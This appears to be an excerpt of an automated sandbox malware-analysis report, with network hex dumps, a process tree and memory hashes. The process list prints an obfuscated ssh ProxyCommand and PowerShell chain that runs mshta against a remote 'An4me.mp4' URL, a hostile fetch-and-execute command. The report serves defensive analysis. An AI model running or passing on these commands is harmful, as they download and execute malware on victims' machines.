                                2024-12-31 14:41:48 UTC1369INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20
                                Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
                                2024-12-31 14:41:48 UTC1017INData Raw: 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c
                                Data Ascii: veal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><
                                2024-12-31 14:41:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.649719188.114.97.34436096C:\Windows\System32\mshta.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 14:41:49 UTC393OUTGET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                Accept: */*
                                Referer: https://klipzynigou.shop/An4me.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: klipzynigou.shop
                                Connection: Keep-Alive
                                2024-12-31 14:41:49 UTC411INHTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:49 GMT
                                Content-Type: text/css
                                Content-Length: 24051
                                Connection: close
                                Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                ETag: "675fc4ac-5df3"
                                Server: cloudflare
                                CF-RAY: 8fab085cfcca429a-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:49 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes
                                2024-12-31 14:41:49 UTC1369INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                2024-12-31 14:41:49 UTC1369INData Raw: 70 65 72 20 64 65 74 61 69 6c 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 66 69 67 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 66 69 67 75 72 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 66 6f 6f 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 65 61 64 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 67 72 6f 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 6d 65 6e 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 6e 61 76 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 3a 61 66 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 3a 62 65 66
                                Data Ascii: per details,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper section,#cf-wrapper summary{display:block}#cf-wrapper .cf-columns:after,#cf-wrapper .cf-columns:bef
                                2024-12-31 14:41:49 UTC1369INData Raw: 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 20 69 6d 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 20 6f 62 6a 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 65 78 74 61 72 65 61 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 35 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78
                                Data Ascii: .cf-columns img,#cf-wrapper .cf-columns input,#cf-wrapper .cf-columns object,#cf-wrapper .cf-columns select,#cf-wrapper .cf-columns textarea{max-width:100%}#cf-wrapper .cf-columns>.cf-column{float:left;padding-bottom:45px;width:100%;box-sizing:border-box
                                2024-12-31 14:41:49 UTC1369INData Raw: 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6c 65 66 74 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 33 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 68 72 65 65 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 33 33 33 25 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 33 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 33 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63
                                Data Ascii: mn:nth-child(odd){clear:left}#cf-wrapper .cf-columns.cols-3>.cf-column,#cf-wrapper .cf-columns.three>.cf-column{padding-left:30px;width:33.3333333333333%}#cf-wrapper .cf-columns.cols-3>.cf-column:first-child,#cf-wrapper .cf-columns.cols-3>.cf-column:nth-c
                                2024-12-31 14:41:49 UTC1369INData Raw: 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 32 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 31 2e 32 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 32 2e 35 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 33 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 33 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 31 2e 32 35 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f
                                Data Ascii: olumns.four>.cf-column:nth-child(4n+2){padding-left:11.25px;padding-right:22.5px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+3),#cf-wrapper .cf-columns.four>.cf-column:nth-child(4n+3){padding-left:22.5px;padding-right:11.25px}#cf-wrapper .cf-co
                                2024-12-31 14:41:49 UTC1369INData Raw: 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 69 73 63 7d 23 63 66 2d 77 72 61 70 70 65 72 20 6f 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 7d 23 63 66 2d 77 72 61 70 70 65 72 20 65 6d 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 75 62 68 65 61 64 6c 69 6e 65 7b 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 74 65 78 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 7d
                                Data Ascii: ,#cf-wrapper ul{list-style:none;margin-left:3em}#cf-wrapper ul{list-style-type:disc}#cf-wrapper ol{list-style-type:decimal}#cf-wrapper em{font-style:italic}#cf-wrapper .cf-subheadline{color:#595959;font-weight:300}#cf-wrapper .cf-text-error{color:#bd2426}
                                2024-12-31 14:41:49 UTC1369INData Raw: 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 73 74 61 63 6b 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 7a 6f 6f 6d 3a 31 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 66 62 66 62 66 3b 62 6f 72 64
                                Data Ascii: elect:none;user-select:none;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1;border-radius:2px;box-sizing:border-box;-webkit-transition:all .2s ease;transition:all .2s ease}#cf-wrapper .cf-btn:hover{background-color:#bfbfbf;bord
                                2024-12-31 14:41:49 UTC1369INData Raw: 69 76 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 66 6f 63 75 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2e 61 63 74 69 76 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 61 63 74 69 76 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 66 6f 63 75 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 2e 61 63 74 69 76 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 3a 61 63 74 69 76 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64
                                Data Ascii: ive,#cf-wrapper .cf-btn-danger:focus,#cf-wrapper .cf-btn-error.active,#cf-wrapper .cf-btn-error:active,#cf-wrapper .cf-btn-error:focus,#cf-wrapper .cf-btn-important.active,#cf-wrapper .cf-btn-important:active,#cf-wrapper .cf-btn-important:focus{background
                                2024-12-31 14:41:49 UTC1369INData Raw: 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 67 72 61 79 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 3a 66 6f 63 75 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 3a 66 6f 63 75 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d
                                Data Ascii: box;-webkit-transition:all .2s ease;transition:all .2s ease;border-radius:2px}#cf-wrapper input:hover,#cf-wrapper select:hover,#cf-wrapper textarea:hover{border-color:gray}#cf-wrapper input:focus,#cf-wrapper select:focus,#cf-wrapper textarea:focus{border-
                                2024-12-31 14:41:49 UTC1369INData Raw: 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 65 35 30 35 32 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 32 31 30 31 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 61 64 61 37 61 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 31 36 62 31 64 3b 63 6f 6c 6f 72 3a 23 35 31 36 62 31 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 2d 77 61 72 6e 69 6e 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 39 62 31 36 39 3b 62 6f
                                Data Ascii: apper .cf-alert-danger,#cf-wrapper .cf-alert-error{background-color:#de5052;border-color:#521010;color:#fff}#cf-wrapper .cf-alert-success{background-color:#bada7a;border-color:#516b1d;color:#516b1d}#cf-wrapper .cf-alert-warning{background-color:#f9b169;bo


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.649720188.114.97.34436096C:\Windows\System32\mshta.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 14:41:50 UTC411OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                Accept: */*
                                Referer: https://klipzynigou.shop/An4me.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: klipzynigou.shop
                                Connection: Keep-Alive
                                2024-12-31 14:41:50 UTC409INHTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:50 GMT
                                Content-Type: image/png
                                Content-Length: 452
                                Connection: close
                                Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                ETag: "675fc4ac-1c4"
                                Server: cloudflare
                                CF-RAY: 8fab0861ad99ef9d-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:50 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes
                                2024-12-31 14:41:50 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:1
                                Start time:09:41:42
                                Start date:31/12/2024
                                Path:C:\Windows\System32\OpenSSH\ssh.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
                                Imagebase:0x7ff7fe0d0000
                                File size:946'176 bytes
                                MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:2
                                Start time:09:41:42
                                Start date:31/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:3
                                Start time:09:41:43
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:09:41:45
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:09:41:46
                                Start date:31/12/2024
                                Path:C:\Windows\System32\mshta.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4
                                Imagebase:0x7ff673e60000
                                File size:14'848 bytes
                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:7
                                Start time:09:41:49
                                Start date:31/12/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Imagebase:0x7ff7403e0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Reset < >
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2398326074.00007FFD33DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd33dd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                  • Instruction ID: 4d8af3db3da5de1f90655ea53577bf690696af590e26dd02b4c002e41850daea
                                  • Opcode Fuzzy Hash: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                  • Instruction Fuzzy Hash: F201677161CB0C4FD744EF4CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2398326074.00007FFD33DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd33dd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 592a04605327799e3ec4bd060826467f3929abc551e10581fb512fa79ddd5f41
                                  • Instruction ID: aa2ed54fdb90f5ae3af23b78993122e986d30214f12fc7c7fe8af4a255f9dff3
                                  • Opcode Fuzzy Hash: 592a04605327799e3ec4bd060826467f3929abc551e10581fb512fa79ddd5f41
                                  • Instruction Fuzzy Hash: 9122A167B0E7D25FE30397AC6CB50D57FA0EF5326570900FBC2D89B093E919980A97A1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2398326074.00007FFD33DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd33dd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a56641cd4ae5954cdef2677f3230aae9e96604c56e00880fd07170e31ddf4178
                                  • Instruction ID: ced0e6c28a8bddab6cf2d170f5de030c39678063e3da1379d9fe0ee61b5ca5f7
                                  • Opcode Fuzzy Hash: a56641cd4ae5954cdef2677f3230aae9e96604c56e00880fd07170e31ddf4178
                                  • Instruction Fuzzy Hash: 02918E93A0E6E20FE712A7ACBDF11D67F70DF4326470901B7D1C89B093E918690A93A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3611401575.000001B27FE10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001B27FE10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1b27fe10000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction ID: ed4aa8d6e4a9b85291d3a409de7f07b8169b8528aeb3b09569ab491c4b606548
                                  • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction Fuzzy Hash: CC90021449D44656D41821920C4669C7040639C290FE44490951690144DA5D029B5256
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3611401575.000001B27FE10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001B27FE10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1b27fe10000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction ID: ed4aa8d6e4a9b85291d3a409de7f07b8169b8528aeb3b09569ab491c4b606548
                                  • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction Fuzzy Hash: CC90021449D44656D41821920C4669C7040639C290FE44490951690144DA5D029B5256
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3611401575.000001B27FE10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001B27FE10000, based on PE: false
                                  Joe Sandbox IDA Plugin
